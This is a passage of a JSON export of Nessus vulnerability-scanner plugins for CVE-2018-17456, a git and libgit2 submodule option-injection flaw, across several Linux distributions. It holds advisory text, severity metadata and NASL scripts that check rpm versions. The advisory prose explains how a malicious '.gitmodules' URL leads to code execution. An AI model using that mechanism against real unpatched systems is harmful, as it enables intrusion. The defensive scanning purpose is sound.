injecting options into library consumers that perform\nrecursive clones (bsc#1110949).\n\nNon-security issues fixed: Version update to version 0.26.8\n(bsc#1114729).\n\nFull changelog can be found at :\n\n - https://github.com/libgit2/libgit2/releases/tag/v0.26.8\n\n - https://github.com/libgit2/libgit2/releases/tag/v0.26.7\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 22, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-01-02T00:00:00", "title": "SUSE SLED15 / SLES15 Security Update : libgit2 (SUSE-SU-2018:4009-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:libgit2-debugsource", "p-cpe:/a:novell:suse_linux:libgit2-devel", "p-cpe:/a:novell:suse_linux:libgit2-26-debuginfo", "p-cpe:/a:novell:suse_linux:libgit2"], "id": "SUSE_SU-2018-4009-1.NASL", "href": "https://www.tenable.com/plugins/nessus/120182", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:4009-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(120182);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/09/10 13:51:49\");\n\n script_cve_id(\"CVE-2018-17456\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : libgit2 (SUSE-SU-2018:4009-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libgit2 fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2018-17456: Submodule URLs and paths with a leading '-' are now\nignored to avoid injecting options into library consumers that perform\nrecursive clones (bsc#1110949).\n\nNon-security issues fixed: Version update to version 0.26.8\n(bsc#1114729).\n\nFull changelog can be found at :\n\n - https://github.com/libgit2/libgit2/releases/tag/v0.26.8\n\n - 
https://github.com/libgit2/libgit2/releases/tag/v0.26.7\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1110949\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1114729\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/libgit2/libgit2/releases/tag/v0.26.7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/libgit2/libgit2/releases/tag/v0.26.8\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-17456/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20184009-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?027f6a9d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Development Tools 15:zypper in -t\npatch SUSE-SLE-Module-Development-Tools-15-2018-2865=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP 
Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libgit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libgit2-26-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libgit2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libgit2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libgit2-26-0.26.8-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libgit2-26-debuginfo-0.26.8-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libgit2-debugsource-0.26.8-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libgit2-devel-0.26.8-3.8.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libgit2-26-0.26.8-3.8.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libgit2-26-debuginfo-0.26.8-3.8.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libgit2-debugsource-0.26.8-3.8.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libgit2-devel-0.26.8-3.8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libgit2\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-15T20:43:16", "description": "Security Fix(es) :\n\n - git: 
arbitrary code execution via .gitmodules\n (CVE-2018-17456)", "edition": 7, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-27T00:00:00", "title": "Scientific Linux Security Update : git on SL7.x x86_64 (20181031)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "modified": "2018-11-27T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:git-gnome-keyring", "p-cpe:/a:fermilab:scientific_linux:perl-Git-SVN", "p-cpe:/a:fermilab:scientific_linux:git-svn", "p-cpe:/a:fermilab:scientific_linux:emacs-git-el", "p-cpe:/a:fermilab:scientific_linux:git-p4", "p-cpe:/a:fermilab:scientific_linux:git-email", "p-cpe:/a:fermilab:scientific_linux:gitk", "p-cpe:/a:fermilab:scientific_linux:git-bzr", "p-cpe:/a:fermilab:scientific_linux:git-hg", "p-cpe:/a:fermilab:scientific_linux:git-all", "p-cpe:/a:fermilab:scientific_linux:git-debuginfo", "p-cpe:/a:fermilab:scientific_linux:git-daemon", "p-cpe:/a:fermilab:scientific_linux:git", "p-cpe:/a:fermilab:scientific_linux:git-instaweb", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:git-gui", "p-cpe:/a:fermilab:scientific_linux:perl-Git", "p-cpe:/a:fermilab:scientific_linux:gitweb", "p-cpe:/a:fermilab:scientific_linux:emacs-git", "p-cpe:/a:fermilab:scientific_linux:git-cvs"], "id": "SL_20181031_GIT_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/119206", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119206);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/24\");\n\n script_cve_id(\"CVE-2018-17456\");\n\n script_name(english:\"Scientific Linux Security Update : git on SL7.x x86_64 (20181031)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The 
remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - git: arbitrary code execution via .gitmodules\n (CVE-2018-17456)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1811&L=scientific-linux-errata&F=&S=&P=2771\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?14c744ea\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:emacs-git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:emacs-git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-bzr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:fermilab:scientific_linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-gnome-keyring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-hg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-instaweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Git-SVN\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", reference:\"emacs-git-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"emacs-git-el-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"git-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-all-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-bzr-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-cvs-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"git-daemon-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"git-debuginfo-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", 
reference:\"git-email-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"git-gnome-keyring-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-gui-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-hg-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-instaweb-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-p4-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"git-svn-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"gitk-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"gitweb-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"perl-Git-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"perl-Git-SVN-1.8.3.1-20.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"emacs-git / emacs-git-el / git / git-all / git-bzr / git-cvs / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:15:47", "description": "Upstream security update resolving an issue with `git clone\n--recurse-submodules`.\n\nFrom the [upstream release\nannouncement](https://public-inbox.org/git/xmqqy3bcuy3l.fsf@gitster-ct\n.c.googlers.com/) :\n\n> These releases fix a security flaw (CVE-2018-17456), which allowed\nan > attacker to execute arbitrary code by crafting a malicious\n.gitmodules > file in a project cloned with --recurse-submodules. > >\nWhen running 'git clone --recurse-submodules', Git parses the supplied\n> .gitmodules file for a URL field and blindly passes it as an\nargument > to a 'git clone' subprocess. 
If the URL field is set to a\nstring that > begins with a dash, this 'git clone' subprocess\ninterprets the URL as > an option. This can lead to executing an\narbitrary script shipped in > the superproject as the user who ran\n'git clone'. > > In addition to fixing the security issue for the user\nrunning 'clone', > the 2.17.2, 2.18.1 and 2.19.1 releases have an\n'fsck' check which can > be used to detect such malicious repository\ncontent when fetching or > accepting a push. See\n'transfer.fsckObjects' in git-config(1). > > Credit for finding and\nfixing this vulnerability goes to joernchen > and Jeff King,\nrespectively.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 17, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "title": "Fedora 29 : git (2018-06090dff59)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "modified": "2019-01-03T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:29", "p-cpe:/a:fedoraproject:fedora:git"], "id": "FEDORA_2018-06090DFF59.NASL", "href": "https://www.tenable.com/plugins/nessus/120213", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-06090dff59.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120213);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-17456\");\n script_xref(name:\"FEDORA\", value:\"2018-06090dff59\");\n\n script_name(english:\"Fedora 29 : git (2018-06090dff59)\");\n script_summary(english:\"Checks rpm output for the 
updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upstream security update resolving an issue with `git clone\n--recurse-submodules`.\n\nFrom the [upstream release\nannouncement](https://public-inbox.org/git/xmqqy3bcuy3l.fsf@gitster-ct\n.c.googlers.com/) :\n\n> These releases fix a security flaw (CVE-2018-17456), which allowed\nan > attacker to execute arbitrary code by crafting a malicious\n.gitmodules > file in a project cloned with --recurse-submodules. > >\nWhen running 'git clone --recurse-submodules', Git parses the supplied\n> .gitmodules file for a URL field and blindly passes it as an\nargument > to a 'git clone' subprocess. If the URL field is set to a\nstring that > begins with a dash, this 'git clone' subprocess\ninterprets the URL as > an option. This can lead to executing an\narbitrary script shipped in > the superproject as the user who ran\n'git clone'. > > In addition to fixing the security issue for the user\nrunning 'clone', > the 2.17.2, 2.18.1 and 2.19.1 releases have an\n'fsck' check which can > be used to detect such malicious repository\ncontent when fetching or > accepting a push. See\n'transfer.fsckObjects' in git-config(1). 
> > Credit for finding and\nfixing this vulnerability goes to joernchen > and Jeff King,\nrespectively.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-06090dff59\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"git-2.19.1-1.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-21T05:56:00", "description": "An update for git is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security impact of Important. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nGit is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es) :\n\n* git: arbitrary code execution via .gitmodules (CVE-2018-17456)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "edition": 12, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-02-04T00:00:00", "title": "RHEL 6 : git (RHSA-2020:0316)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "modified": "2020-02-04T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:git-svn", "p-cpe:/a:redhat:enterprise_linux:perl-Git", "p-cpe:/a:redhat:enterprise_linux:git-all", "p-cpe:/a:redhat:enterprise_linux:emacs-git-el", "p-cpe:/a:redhat:enterprise_linux:git", "p-cpe:/a:redhat:enterprise_linux:git-gui", "p-cpe:/a:redhat:enterprise_linux:gitk", "p-cpe:/a:redhat:enterprise_linux:git-cvs", "p-cpe:/a:redhat:enterprise_linux:gitweb", "p-cpe:/a:redhat:enterprise_linux:git-daemon", "p-cpe:/a:redhat:enterprise_linux:git-email", "cpe:/o:redhat:enterprise_linux:6::client", "cpe:/o:redhat:enterprise_linux:6::workstation", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:emacs-git", "cpe:/o:redhat:enterprise_linux:6::computenode", 
"cpe:/o:redhat:enterprise_linux:6::server"], "id": "REDHAT-RHSA-2020-0316.NASL", "href": "https://www.tenable.com/plugins/nessus/133445", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:0316. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133445);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/19\");\n\n script_cve_id(\"CVE-2018-17456\");\n script_bugtraq_id(105523, 107511);\n script_xref(name:\"RHSA\", value:\"2020:0316\");\n\n script_name(english:\"RHEL 6 : git (RHSA-2020:0316)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for git is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nGit is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. 
